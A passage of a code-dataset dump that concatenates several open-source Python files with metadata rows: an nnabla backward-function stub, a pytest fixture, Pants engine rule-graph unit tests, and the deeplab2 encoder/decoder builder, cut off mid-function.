] | null | null | null | # Copyright (c) 2017 Sony Corporation. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import nnabla as nn
from .backward_function import BackwardFunction
class SinkBackward(BackwardFunction):
    """Backward function for Sink; its own backward pass is undefined."""

    @property
    def name(self):
        return 'SinkBackward'

    def _create_forward_inputs_and_outputs(self, inputs, outputs):
        # Rebuild the forward graph's input variables: their data comes from
        # the backward-graph inputs and their gradients are routed into the
        # backward-graph outputs.
        inputs_fwd = []
        for idx in range(self._num_inputs_fwd):
            fwd_in = self.forward_func.inputs[idx]
            var = nn.Variable(inputs[idx].shape, need_grad=fwd_in.need_grad)
            var.data = inputs[idx].data
            var.grad = outputs[idx].data
            inputs_fwd.append(var)
        # Rebuild the forward graph's output variables; their gradients are
        # taken from the trailing backward-graph inputs.
        outputs_fwd = []
        for idx in range(self._num_outputs_fwd):
            bwd_in = inputs[self._num_inputs_fwd + idx]
            var = nn.Variable(bwd_in.shape)
            var.grad = bwd_in.data
            outputs_fwd.append(var)
        return inputs_fwd, outputs_fwd

    def backward_impl(self, inputs, outputs, prop_down, accum):
        # inputs: [inputs_fwd_graph] + [inputs_bwd_graph] or
        # [inputs_fwd_graph] + [outputs_fwd_graph] + [inputs_bwd_graph]
        raise NotImplementedError(
            "The backward method of SinkBackward class is not implemented.")
| 36.714286 | 76 | 0.673152 |
4c9f88d00244732bb4cd7fca0243fb3cea38ba14 | 27 | py | Python | python/hpctl/hpctl/version.py | domyounglee/baseline | 2261abfb7e770cc6f3d63a7f6e0015238d0e11f8 | [
"Apache-2.0"
] | 24 | 2018-08-06T07:31:48.000Z | 2021-04-13T07:49:43.000Z | python/hpctl/hpctl/version.py | domyounglee/baseline | 2261abfb7e770cc6f3d63a7f6e0015238d0e11f8 | [
"Apache-2.0"
] | 3 | 2019-04-20T14:08:57.000Z | 2020-03-30T08:27:17.000Z | python/hpctl/hpctl/version.py | domyounglee/baseline | 2261abfb7e770cc6f3d63a7f6e0015238d0e11f8 | [
"Apache-2.0"
] | 3 | 2019-04-20T14:11:27.000Z | 2020-12-17T10:45:19.000Z | __version__ = '0.2.0.dev0'
| 13.5 | 26 | 0.666667 |
127b9ba8d75c8425aa1a218318c86ebb10f44606 | 185 | py | Python | tests/conftest.py | tdcoa/usage | 408091f77360fe29e14186b60746fd7d60713e42 | [
"MIT"
] | null | null | null | tests/conftest.py | tdcoa/usage | 408091f77360fe29e14186b60746fd7d60713e42 | [
"MIT"
] | 4 | 2020-07-21T18:42:22.000Z | 2020-10-14T00:50:45.000Z | tests/conftest.py | tdcoa/usage | 408091f77360fe29e14186b60746fd7d60713e42 | [
"MIT"
] | 1 | 2020-08-05T20:09:41.000Z | 2020-08-05T20:09:41.000Z | "global setup including fixtures"
from pathlib import Path
import pytest
@pytest.fixture(scope="session")
def testdir(request) -> Path:
    """Session-scoped fixture: path of the ``tests`` directory under the rootdir."""
    return Path(request.config.rootdir) / "tests"
| 20.555556 | 46 | 0.767568 |
c72d1c2694be4a98e46359aac7b3cf28adb43f86 | 23,314 | py | Python | tests/python/pants_test/engine/test_rules.py | pall-valmundsson/pants | 434533ad83d6b3e88723829a28b9b42f80f1cc09 | [
"Apache-2.0"
] | null | null | null | tests/python/pants_test/engine/test_rules.py | pall-valmundsson/pants | 434533ad83d6b3e88723829a28b9b42f80f1cc09 | [
"Apache-2.0"
] | null | null | null | tests/python/pants_test/engine/test_rules.py | pall-valmundsson/pants | 434533ad83d6b3e88723829a28b9b42f80f1cc09 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, division, print_function, unicode_literals
import re
import sys
import unittest
from builtins import object, str
from textwrap import dedent
from pants.engine.build_files import create_graph_rules
from pants.engine.console import Console
from pants.engine.fs import create_fs_rules
from pants.engine.mapper import AddressMapper
from pants.engine.rules import (RootRule, RuleIndex, SingletonRule, _GoalProduct, _RuleVisitor,
console_rule, rule)
from pants.engine.selectors import Get, Select
from pants.util.objects import Exactly
from pants_test.engine.examples.parsers import JsonParser
from pants_test.engine.util import (TargetTable, assert_equal_with_printing, create_scheduler,
run_rule)
class A(object):
  """Trivial marker type used as a rule product/subject in these tests."""
  def __repr__(self):
    return 'A()'
class B(object):
  """Trivial marker type used as a rule product/subject in these tests."""
  def __repr__(self):
    return 'B()'
class C(object):
  """Trivial marker type used as a rule product/subject in these tests."""
  def __repr__(self):
    return 'C()'
class D(object):
  """Trivial marker type used as a rule product/subject in these tests."""
  def __repr__(self):
    return 'D()'
def noop(*args):
  """Accept any positional arguments and do nothing."""
  return None
class SubA(A):
  """Subclass of A, used to exercise subclass/parameter-type matching."""
  def __repr__(self):
    return 'SubA()'
_suba_root_rules = [RootRule(SubA)]
@console_rule('example', [Select(Console)])
def a_console_rule_generator(console):
  # Example @console_rule: requests an A for a string subject, then prints it.
  a = yield Get(A, str('a str!'))
  console.print_stdout(str(a))
class RuleTest(unittest.TestCase):
  """Tests running @console_rule generators in isolation via run_rule."""
  def test_run_rule_console_rule_generator(self):
    # The mapping stubs out the Get(A, str) request made by the generator.
    res = run_rule(a_console_rule_generator, Console(), {
      (A, str): lambda _: A(),
    })
    self.assertEquals(res, _GoalProduct.for_name('example')())
class RuleIndexTest(unittest.TestCase):
  """Tests input validation performed by RuleIndex.create."""
  def test_creation_fails_with_bad_declaration_type(self):
    with self.assertRaises(TypeError) as cm:
      RuleIndex.create([A()])
    self.assertEqual("Unexpected rule type: <class 'pants_test.engine.test_rules.A'>."
                     " Rules either extend Rule, or are static functions decorated with @rule.",
                     str(cm.exception))
class RulesetValidatorTest(unittest.TestCase):
  """Tests that scheduler construction rejects invalid rule sets with precise errors."""
  def test_ruleset_with_missing_product_type(self):
    @rule(A, [Select(B)])
    def a_from_b_noop(b):
      pass
    rules = _suba_root_rules + [a_from_b_noop]
    with self.assertRaises(Exception) as cm:
      create_scheduler(rules)
    self.assert_equal_with_printing(dedent("""
                     Rules with errors: 1
                       (A, [Select(B)], a_from_b_noop):
                         No rule was available to compute B with parameter type SubA
                     """).strip(),
                                    str(cm.exception))
  def test_ruleset_with_ambiguity(self):
    @rule(A, [Select(C), Select(B)])
    def a_from_c_and_b(c, b):
      pass
    @rule(A, [Select(B), Select(C)])
    def a_from_b_and_c(b, c):
      pass
    @rule(D, [Select(A)])
    def d_from_a(a):
      pass
    rules = [
        a_from_c_and_b,
        a_from_b_and_c,
        RootRule(B),
        RootRule(C),
        # TODO: Without a rule triggering the selection of A, we don't detect ambiguity here.
        d_from_a,
      ]
    with self.assertRaises(Exception) as cm:
      create_scheduler(rules)
    self.assert_equal_with_printing(dedent("""
                     Rules with errors: 1
                       (D, [Select(A)], d_from_a):
                         ambiguous rules for Select(A) with parameter types (B+C):
                           (A, [Select(B), Select(C)], a_from_b_and_c) for (B+C)
                           (A, [Select(C), Select(B)], a_from_c_and_b) for (B+C)
                     """).strip(),
                                    str(cm.exception))
  def test_ruleset_with_rule_with_two_missing_selects(self):
    @rule(A, [Select(B), Select(C)])
    def a_from_b_and_c(b, c):
      pass
    rules = _suba_root_rules + [a_from_b_and_c]
    with self.assertRaises(Exception) as cm:
      create_scheduler(rules)
    self.assert_equal_with_printing(dedent("""
                     Rules with errors: 1
                       (A, [Select(B), Select(C)], a_from_b_and_c):
                         No rule was available to compute B with parameter type SubA
                         No rule was available to compute C with parameter type SubA
                     """).strip(),
                                    str(cm.exception))
  def test_ruleset_with_selector_only_provided_as_root_subject(self):
    @rule(A, [Select(B)])
    def a_from_b(b):
      pass
    rules = [RootRule(B), a_from_b]
    # Should not raise: B is fulfillable as a root subject.
    create_scheduler(rules)
  def test_ruleset_with_superclass_of_selected_type_produced_fails(self):
    @rule(A, [Select(B)])
    def a_from_b(b):
      pass
    @rule(B, [Select(SubA)])
    def b_from_suba(suba):
      pass
    rules = [
        RootRule(C),
        a_from_b,
        b_from_suba,
      ]
    with self.assertRaises(Exception) as cm:
      create_scheduler(rules)
    self.assert_equal_with_printing(dedent("""
                     Rules with errors: 2
                       (A, [Select(B)], a_from_b):
                         No rule was available to compute B with parameter type C
                       (B, [Select(SubA)], b_from_suba):
                         No rule was available to compute SubA with parameter type C
                     """).strip(),
                                    str(cm.exception))
  def test_ruleset_with_explicit_type_constraint(self):
    @rule(Exactly(A), [Select(B)])
    def a_from_b(b):
      pass
    @rule(B, [Select(A)])
    def b_from_a(a):
      pass
    rules = _suba_root_rules + [
      a_from_b,
      b_from_a,
    ]
    # Should not raise: the Exactly constraint is satisfiable.
    create_scheduler(rules)
  def test_ruleset_with_failure_due_to_incompatible_subject_for_singleton(self):
    @rule(D, [Select(C)])
    def d_from_c(c):
      pass
    rules = [
        RootRule(A),
        d_from_c,
        SingletonRule(B, B()),
      ]
    with self.assertRaises(Exception) as cm:
      create_scheduler(rules)
    # This error message could note near matches like the singleton.
    self.assert_equal_with_printing(dedent("""
                     Rules with errors: 1
                       (D, [Select(C)], d_from_c):
                         No rule was available to compute C with parameter type A
                     """).strip(),
                                    str(cm.exception))
  def test_not_fulfillable_duplicated_dependency(self):
    # If a rule depends on another rule+subject in two ways, and one of them is unfulfillable
    # Only the unfulfillable one should be in the errors.
    @rule(B, [Select(D)])
    def b_from_d(d):
      pass
    @rule(D, [Select(A), Select(SubA)])
    def d_from_a_and_suba(a, suba):
      _ = yield Get(A, C, C())  # noqa: F841
    @rule(A, [Select(C)])
    def a_from_c(c):
      pass
    rules = _suba_root_rules + [
      b_from_d,
      d_from_a_and_suba,
      a_from_c,
    ]
    with self.assertRaises(Exception) as cm:
      create_scheduler(rules)
    self.assert_equal_with_printing(dedent("""
                     Rules with errors: 2
                       (B, [Select(D)], b_from_d):
                         No rule was available to compute D with parameter type SubA
                       (D, [Select(A), Select(SubA)], [Get(A, C)], d_from_a_and_suba):
                         No rule was available to compute A with parameter type SubA
                     """).strip(),
                                    str(cm.exception))
  # Bind the module-level helper as a class attribute so it is usable as a method.
  assert_equal_with_printing = assert_equal_with_printing
class RuleGraphMakerTest(unittest.TestCase):
  """Tests the rule-graph construction/visualization output for small rule sets."""
  # TODO HasProducts?
  def test_smallest_full_test(self):
    @rule(Exactly(A), [Select(SubA)])
    def a_from_suba(suba):
      pass
    rules = _suba_root_rules + [
      RootRule(SubA),
      a_from_suba,
    ]
    fullgraph = self.create_full_graph(rules)
    self.assert_equal_with_printing(dedent("""
                     digraph {
                       // root subject types: SubA
                       // root entries
                         "Select(A) for SubA" [color=blue]
                         "Select(A) for SubA" -> {"(A, [Select(SubA)], a_from_suba) for SubA"}
                       // internal entries
                         "(A, [Select(SubA)], a_from_suba) for SubA" -> {"Param(SubA)"}
                     }""").strip(), fullgraph)
  def test_full_graph_for_planner_example(self):
    symbol_table = TargetTable()
    address_mapper = AddressMapper(JsonParser(symbol_table), '*.BUILD.json')
    rules = create_graph_rules(address_mapper) + create_fs_rules()
    fullgraph_str = self.create_full_graph(rules)
    print('---diagnostic------')
    print(fullgraph_str)
    print('/---diagnostic------')
    in_root_rules = False
    in_all_rules = False
    all_rules = []
    root_rule_lines = []
    for line in fullgraph_str.splitlines():
      if line.startswith('  // root subject types:'):
        pass
      elif line.startswith('  // root entries'):
        in_root_rules = True
      elif line.startswith('  // internal entries'):
        in_all_rules = True
      elif in_all_rules:
        all_rules.append(line)
      elif in_root_rules:
        root_rule_lines.append(line)
      else:
        pass
    # Sanity-check only the sizes of the sections, not their exact content.
    self.assertTrue(6 < len(all_rules))
    self.assertTrue(12 < len(root_rule_lines))  # 2 lines per entry
  def test_smallest_full_test_multiple_root_subject_types(self):
    @rule(A, [Select(SubA)])
    def a_from_suba(suba):
      pass
    @rule(B, [Select(A)])
    def b_from_a(a):
      pass
    rules = [
      RootRule(SubA),
      RootRule(A),
      a_from_suba,
      b_from_a,
    ]
    fullgraph = self.create_full_graph(rules)
    self.assert_equal_with_printing(dedent("""
                     digraph {
                       // root subject types: A, SubA
                       // root entries
                         "Select(A) for A" [color=blue]
                         "Select(A) for A" -> {"Param(A)"}
                         "Select(A) for SubA" [color=blue]
                         "Select(A) for SubA" -> {"(A, [Select(SubA)], a_from_suba) for SubA"}
                         "Select(B) for A" [color=blue]
                         "Select(B) for A" -> {"(B, [Select(A)], b_from_a) for A"}
                         "Select(B) for SubA" [color=blue]
                         "Select(B) for SubA" -> {"(B, [Select(A)], b_from_a) for SubA"}
                       // internal entries
                         "(A, [Select(SubA)], a_from_suba) for SubA" -> {"Param(SubA)"}
                         "(B, [Select(A)], b_from_a) for A" -> {"Param(A)"}
                         "(B, [Select(A)], b_from_a) for SubA" -> {"(A, [Select(SubA)], a_from_suba) for SubA"}
                     }""").strip(),
      fullgraph)
  def test_single_rule_depending_on_subject_selection(self):
    @rule(Exactly(A), [Select(SubA)])
    def a_from_suba(suba):
      pass
    rules = [
      a_from_suba,
    ]
    subgraph = self.create_subgraph(A, rules, SubA())
    self.assert_equal_with_printing(dedent("""
                     digraph {
                       // root subject types: SubA
                       // root entries
                         "Select(A) for SubA" [color=blue]
                         "Select(A) for SubA" -> {"(A, [Select(SubA)], a_from_suba) for SubA"}
                       // internal entries
                         "(A, [Select(SubA)], a_from_suba) for SubA" -> {"Param(SubA)"}
                     }""").strip(),
      subgraph)
  def test_multiple_selects(self):
    @rule(Exactly(A), [Select(SubA), Select(B)])
    def a_from_suba_and_b(suba, b):
      pass
    @rule(B, [])
    def b():
      pass
    rules = [
      a_from_suba_and_b,
      b,
    ]
    subgraph = self.create_subgraph(A, rules, SubA())
    self.assert_equal_with_printing(dedent("""
                     digraph {
                       // root subject types: SubA
                       // root entries
                         "Select(A) for SubA" [color=blue]
                         "Select(A) for SubA" -> {"(A, [Select(SubA), Select(B)], a_from_suba_and_b) for SubA"}
                       // internal entries
                         "(A, [Select(SubA), Select(B)], a_from_suba_and_b) for SubA" -> {"(B, [], b) for ()" "Param(SubA)"}
                         "(B, [], b) for ()" -> {}
                     }""").strip(),
      subgraph)
  def test_one_level_of_recursion(self):
    @rule(Exactly(A), [Select(B)])
    def a_from_b(b):
      pass
    @rule(B, [Select(SubA)])
    def b_from_suba(suba):
      pass
    rules = [
      a_from_b,
      b_from_suba,
    ]
    subgraph = self.create_subgraph(A, rules, SubA())
    self.assert_equal_with_printing(dedent("""
                     digraph {
                       // root subject types: SubA
                       // root entries
                         "Select(A) for SubA" [color=blue]
                         "Select(A) for SubA" -> {"(A, [Select(B)], a_from_b) for SubA"}
                       // internal entries
                         "(A, [Select(B)], a_from_b) for SubA" -> {"(B, [Select(SubA)], b_from_suba) for SubA"}
                         "(B, [Select(SubA)], b_from_suba) for SubA" -> {"Param(SubA)"}
                     }""").strip(),
      subgraph)
  def test_noop_removal_in_subgraph(self):
    @rule(Exactly(A), [Select(C)])
    def a_from_c(c):
      pass
    @rule(Exactly(A), [])
    def a():
      pass
    rules = [
      a_from_c,
      a,
      SingletonRule(B, B()),
    ]
    subgraph = self.create_subgraph(A, rules, SubA(), validate=False)
    self.assert_equal_with_printing(dedent("""
                     digraph {
                       // root subject types: SubA
                       // root entries
                         "Select(A) for ()" [color=blue]
                         "Select(A) for ()" -> {"(A, [], a) for ()"}
                       // internal entries
                         "(A, [], a) for ()" -> {}
                     }""").strip(),
      subgraph)
  def test_noop_removal_full_single_subject_type(self):
    @rule(Exactly(A), [Select(C)])
    def a_from_c(c):
      pass
    @rule(Exactly(A), [])
    def a():
      pass
    rules = _suba_root_rules + [
      a_from_c,
      a,
    ]
    fullgraph = self.create_full_graph(rules, validate=False)
    self.assert_equal_with_printing(dedent("""
                     digraph {
                       // root subject types: SubA
                       // root entries
                         "Select(A) for ()" [color=blue]
                         "Select(A) for ()" -> {"(A, [], a) for ()"}
                       // internal entries
                         "(A, [], a) for ()" -> {}
                     }""").strip(),
      fullgraph)
  def test_root_tuple_removed_when_no_matches(self):
    @rule(A, [Select(C)])
    def a_from_c(c):
      pass
    @rule(B, [Select(D), Select(A)])
    def b_from_d_and_a(d, a):
      pass
    rules = [
      RootRule(C),
      RootRule(D),
      a_from_c,
      b_from_d_and_a,
    ]
    fullgraph = self.create_full_graph(rules, validate=False)
    self.assert_equal_with_printing(dedent("""
                     digraph {
                       // root subject types: C, D
                       // root entries
                         "Select(A) for C" [color=blue]
                         "Select(A) for C" -> {"(A, [Select(C)], a_from_c) for C"}
                         "Select(B) for (C+D)" [color=blue]
                         "Select(B) for (C+D)" -> {"(B, [Select(D), Select(A)], b_from_d_and_a) for (C+D)"}
                       // internal entries
                         "(A, [Select(C)], a_from_c) for C" -> {"Param(C)"}
                         "(B, [Select(D), Select(A)], b_from_d_and_a) for (C+D)" -> {"(A, [Select(C)], a_from_c) for C" "Param(D)"}
                     }""").strip(),
      fullgraph)
  def test_noop_removal_transitive(self):
    # If a noop-able rule has rules that depend on it,
    # they should be removed from the graph.
    @rule(Exactly(B), [Select(C)])
    def b_from_c(c):
      pass
    @rule(Exactly(A), [Select(B)])
    def a_from_b(b):
      pass
    @rule(Exactly(A), [])
    def a():
      pass
    rules = [
      b_from_c,
      a_from_b,
      a,
    ]
    subgraph = self.create_subgraph(A, rules, SubA(), validate=False)
    self.assert_equal_with_printing(dedent("""
                     digraph {
                       // root subject types: SubA
                       // root entries
                         "Select(A) for ()" [color=blue]
                         "Select(A) for ()" -> {"(A, [], a) for ()"}
                       // internal entries
                         "(A, [], a) for ()" -> {}
                     }""").strip(),
      subgraph)
  def test_get_with_matching_singleton(self):
    @rule(Exactly(A), [Select(SubA)])
    def a_from_suba(suba):
      _ = yield Get(B, C, C())  # noqa: F841
    rules = [
      a_from_suba,
      SingletonRule(B, B()),
    ]
    subgraph = self.create_subgraph(A, rules, SubA())
    self.assert_equal_with_printing(dedent("""
                     digraph {
                       // root subject types: SubA
                       // root entries
                         "Select(A) for SubA" [color=blue]
                         "Select(A) for SubA" -> {"(A, [Select(SubA)], [Get(B, C)], a_from_suba) for SubA"}
                       // internal entries
                         "(A, [Select(SubA)], [Get(B, C)], a_from_suba) for SubA" -> {"Param(SubA)" "Singleton(B(), B)"}
                     }""").strip(),
      subgraph)
  def test_depends_on_multiple_one_noop(self):
    @rule(B, [Select(A)])
    def b_from_a(a):
      pass
    @rule(A, [Select(C)])
    def a_from_c(c):
      pass
    @rule(A, [Select(SubA)])
    def a_from_suba(suba):
      pass
    rules = [
      b_from_a,
      a_from_c,
      a_from_suba,
    ]
    subgraph = self.create_subgraph(B, rules, SubA(), validate=False)
    self.assert_equal_with_printing(dedent("""
                     digraph {
                       // root subject types: SubA
                       // root entries
                         "Select(B) for SubA" [color=blue]
                         "Select(B) for SubA" -> {"(B, [Select(A)], b_from_a) for SubA"}
                       // internal entries
                         "(A, [Select(SubA)], a_from_suba) for SubA" -> {"Param(SubA)"}
                         "(B, [Select(A)], b_from_a) for SubA" -> {"(A, [Select(SubA)], a_from_suba) for SubA"}
                     }""").strip(),
      subgraph)
  def test_multiple_depend_on_same_rule(self):
    @rule(B, [Select(A)])
    def b_from_a(a):
      pass
    @rule(C, [Select(A)])
    def c_from_a(a):
      pass
    @rule(A, [Select(SubA)])
    def a_from_suba(suba):
      pass
    rules = _suba_root_rules + [
      b_from_a,
      c_from_a,
      a_from_suba,
    ]
    subgraph = self.create_full_graph(rules)
    self.assert_equal_with_printing(dedent("""
                     digraph {
                       // root subject types: SubA
                       // root entries
                         "Select(A) for SubA" [color=blue]
                         "Select(A) for SubA" -> {"(A, [Select(SubA)], a_from_suba) for SubA"}
                         "Select(B) for SubA" [color=blue]
                         "Select(B) for SubA" -> {"(B, [Select(A)], b_from_a) for SubA"}
                         "Select(C) for SubA" [color=blue]
                         "Select(C) for SubA" -> {"(C, [Select(A)], c_from_a) for SubA"}
                       // internal entries
                         "(A, [Select(SubA)], a_from_suba) for SubA" -> {"Param(SubA)"}
                         "(B, [Select(A)], b_from_a) for SubA" -> {"(A, [Select(SubA)], a_from_suba) for SubA"}
                         "(C, [Select(A)], c_from_a) for SubA" -> {"(A, [Select(SubA)], a_from_suba) for SubA"}
                     }""").strip(),
      subgraph)
  def test_get_simple(self):
    @rule(Exactly(A), [])
    def a():
      _ = yield Get(B, D, D())  # noqa: F841
    @rule(B, [Select(D)])
    def b_from_d(d):
      pass
    rules = [
      a,
      b_from_d,
    ]
    subgraph = self.create_subgraph(A, rules, SubA())
    self.assert_equal_with_printing(dedent("""
                     digraph {
                       // root subject types: SubA
                       // root entries
                         "Select(A) for ()" [color=blue]
                         "Select(A) for ()" -> {"(A, [], [Get(B, D)], a) for ()"}
                       // internal entries
                         "(A, [], [Get(B, D)], a) for ()" -> {"(B, [Select(D)], b_from_d) for D"}
                         "(B, [Select(D)], b_from_d) for D" -> {"Param(D)"}
                     }""").strip(),
      subgraph)
  def test_validate_yield_statements(self):
    with self.assertRaisesRegexp(_RuleVisitor.YieldVisitError, re.escape('yield A()')):
      @rule(A, [])
      def f():
        yield A()
        # The yield statement isn't at the end of this series of statements.
        return
    with self.assertRaises(_RuleVisitor.YieldVisitError) as cm:
      @rule(A, [])
      def h():
        yield A(
          1 + 2
        )
        return
    # Test that the full indentation of multiple-line yields are represented in the output.
    self.assertIn("""\
        yield A(
          1 + 2
        )
""", str(cm.exception))
    with self.assertRaises(_RuleVisitor.YieldVisitError) as cm:
      @rule(A, [])
      def g():
        # This is a yield statement without an assignment, and not at the end.
        yield Get(B, D, D())
        yield A()
    exc_msg = str(cm.exception)
    exc_msg_trimmed = re.sub(r'^.*?(test_rules\.py)', r'\1', exc_msg, flags=re.MULTILINE)
    self.assertEquals(exc_msg_trimmed, """\
In function g: yield in @rule without assignment must come at the end of a series of statements.
A yield in an @rule without an assignment is equivalent to a return, and we
currently require that no statements follow such a yield at the same level of nesting.
Use `_ = yield Get(...)` if you wish to yield control to the engine and discard the result.
The invalid statement was:
test_rules.py:{lineno}:{col}
 yield Get(B, D, D())
The rule defined by function `g` begins at:
test_rules.py:{rule_lineno}:{rule_col}
 with self.assertRaises(_RuleVisitor.YieldVisitError) as cm:
   @rule(A, [])
   def g():
""".format(lineno=(sys._getframe().f_lineno - 20),
           col=8,
           rule_lineno=(sys._getframe().f_lineno - 25),
           rule_col=6))
  def create_full_graph(self, rules, validate=True):
    # Helper: render the whole rule graph for `rules` as a dot string.
    scheduler = create_scheduler(rules, validate=validate)
    return "\n".join(scheduler.rule_graph_visualization())
  def create_subgraph(self, requested_product, rules, subject, validate=True):
    # Helper: render only the subgraph reachable for (subject type, product).
    scheduler = create_scheduler(rules + _suba_root_rules, validate=validate)
    return "\n".join(scheduler.rule_subgraph_visualization(type(subject), requested_product))
  # Bind the module-level helper as a class attribute so it is usable as a method.
  assert_equal_with_printing = assert_equal_with_printing
| 31.67663 | 131 | 0.528009 |
b8e66f6142ce1de30236a731a290cab9c8e87a69 | 7,102 | py | Python | model/builder.py | hjonnala/deeplab2 | 1868757c4333ec5287cc0bf0a6bbf38fbbe34c2e | [
"Apache-2.0"
] | null | null | null | model/builder.py | hjonnala/deeplab2 | 1868757c4333ec5287cc0bf0a6bbf38fbbe34c2e | [
"Apache-2.0"
] | null | null | null | model/builder.py | hjonnala/deeplab2 | 1868757c4333ec5287cc0bf0a6bbf38fbbe34c2e | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2021 The Deeplab2 Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This file contains functions to build encoder and decoder."""
import tensorflow as tf
from deeplab2 import config_pb2
from deeplab2.model.decoder import deeplabv3
from deeplab2.model.decoder import deeplabv3plus
from deeplab2.model.decoder import max_deeplab
from deeplab2.model.decoder import motion_deeplab_decoder
from deeplab2.model.decoder import panoptic_deeplab
from deeplab2.model.decoder import vip_deeplab_decoder
from deeplab2.model.encoder import axial_resnet_instances
from deeplab2.model.encoder import mobilenet
def create_encoder(backbone_options: config_pb2.ModelOptions.BackboneOptions,
                   bn_layer: tf.keras.layers.Layer,
                   conv_kernel_weight_decay: float = 0.0) -> tf.keras.Model:
  """Creates an encoder.

  Args:
    backbone_options: A proto config of type
      config_pb2.ModelOptions.BackboneOptions.
    bn_layer: A tf.keras.layers.Layer that computes the normalization.
    conv_kernel_weight_decay: A float, the weight decay for convolution kernels.

  Returns:
    An instance of tf.keras.Model containing the encoder.

  Raises:
    ValueError: An error occurs when the specified encoder meta architecture is
      not supported.
  """
  name = backbone_options.name
  # All axial/ResNet-style backbones share one factory; MobileNets another.
  # Dispatch is by substring match on the backbone name.
  if any(family in name
         for family in ('resnet', 'swidernet', 'axial_deeplab', 'max_deeplab')):
    return create_resnet_encoder(
        backbone_options,
        bn_layer=bn_layer,
        conv_kernel_weight_decay=conv_kernel_weight_decay)
  if 'mobilenet' in name:
    return create_mobilenet_encoder(
        backbone_options,
        bn_layer=bn_layer,
        conv_kernel_weight_decay=conv_kernel_weight_decay)
  raise ValueError('The specified encoder %s is not a valid encoder.' % name)
def create_mobilenet_encoder(
    backbone_options: config_pb2.ModelOptions.BackboneOptions,
    bn_layer: tf.keras.layers.Layer,
    conv_kernel_weight_decay: float = 0.0) -> tf.keras.Model:
  """Creates a MobileNet encoder specified by name.

  Args:
    backbone_options: A proto config of type
      config_pb2.ModelOptions.BackboneOptions.
    bn_layer: A tf.keras.layers.Layer that computes the normalization.
    conv_kernel_weight_decay: A float, the weight decay for convolution kernels.

  Returns:
    An instance of tf.keras.Model containing the MobileNet encoder.
  """
  # Map lowercase names to backbone class names; the class is resolved lazily
  # (only for a valid name) to mirror the original branch-by-branch lookup.
  class_names = {
      'mobilenet_v3_large': 'MobileNetV3Large',
      'mobilenet_v3_small': 'MobileNetV3Small',
      'mobilenet_v3_small_edgetpu': 'MobileNetV3SmallEdgeTPU',
  }
  key = backbone_options.name.lower()
  if key not in class_names:
    raise ValueError('The specified encoder %s is not a valid encoder.' %
                     backbone_options.name)
  backbone = getattr(mobilenet, class_names[key])
  # MobileNet backbones do not support these options; the config must keep
  # them at their defaults.
  assert backbone_options.use_squeeze_and_excite
  assert backbone_options.drop_path_keep_prob == 1
  assert backbone_options.use_sac_beyond_stride == -1
  assert backbone_options.backbone_layer_multiplier == 1
  return backbone(
      output_stride=backbone_options.output_stride,
      width_multiplier=backbone_options.backbone_width_multiplier,
      bn_layer=bn_layer,
      conv_kernel_weight_decay=conv_kernel_weight_decay)
def create_resnet_encoder(
    backbone_options: config_pb2.ModelOptions.BackboneOptions,
    bn_layer: tf.keras.layers.Layer,
    conv_kernel_weight_decay: float = 0.0) -> tf.keras.Model:
  """Creates a ResNet encoder specified by name.

  Args:
    backbone_options: A proto config of type
      config_pb2.ModelOptions.BackboneOptions.
    bn_layer: A tf.keras.layers.Layer that computes the normalization.
    conv_kernel_weight_decay: A float, the weight decay for convolution kernels.

  Returns:
    An instance of tf.keras.Model containing the ResNet encoder.
  """
  # Per-block-group options are collected into one dict for the factory.
  block_group_config = {
      'use_squeeze_and_excite': backbone_options.use_squeeze_and_excite,
      'drop_path_keep_prob': backbone_options.drop_path_keep_prob,
      'drop_path_schedule': backbone_options.drop_path_schedule,
      'use_sac_beyond_stride': backbone_options.use_sac_beyond_stride,
  }
  return axial_resnet_instances.get_model(
      backbone_options.name,
      output_stride=backbone_options.output_stride,
      stem_width_multiplier=backbone_options.stem_width_multiplier,
      width_multiplier=backbone_options.backbone_width_multiplier,
      backbone_layer_multiplier=backbone_options.backbone_layer_multiplier,
      block_group_config=block_group_config,
      bn_layer=bn_layer,
      conv_kernel_weight_decay=conv_kernel_weight_decay)
def create_decoder(model_options: config_pb2.ModelOptions,
                   bn_layer: tf.keras.layers.Layer,
                   ignore_label: int) -> tf.keras.Model:
  """Creates a DeepLab decoder.

  Args:
    model_options: A proto config of type config_pb2.ModelOptions.
    bn_layer: A tf.keras.layers.Layer that computes the normalization.
    ignore_label: An integer specifying the ignore label.

  Returns:
    An instance of tf.keras.layers.Layer containing the decoder.

  Raises:
    ValueError: An error occurs when the specified meta architecture is not
      supported.
  """
  meta_architecture = model_options.WhichOneof('meta_architecture')
  # Lazy builders: only the selected decoder is actually constructed.
  decoder_builders = {
      'deeplab_v3': lambda: deeplabv3.DeepLabV3(
          model_options.decoder, model_options.deeplab_v3, bn_layer=bn_layer),
      'deeplab_v3_plus': lambda: deeplabv3plus.DeepLabV3Plus(
          model_options.decoder, model_options.deeplab_v3_plus,
          bn_layer=bn_layer),
      'panoptic_deeplab': lambda: panoptic_deeplab.PanopticDeepLab(
          model_options.decoder, model_options.panoptic_deeplab,
          bn_layer=bn_layer),
      'motion_deeplab': lambda: motion_deeplab_decoder.MotionDeepLabDecoder(
          model_options.decoder, model_options.motion_deeplab,
          bn_layer=bn_layer),
      'vip_deeplab': lambda: vip_deeplab_decoder.ViPDeepLabDecoder(
          model_options.decoder, model_options.vip_deeplab,
          bn_layer=bn_layer),
      'max_deeplab': lambda: max_deeplab.MaXDeepLab(
          model_options.decoder, model_options.max_deeplab,
          ignore_label=ignore_label, bn_layer=bn_layer),
  }
  if meta_architecture not in decoder_builders:
    raise ValueError('The specified meta architecture %s is not implemented.' %
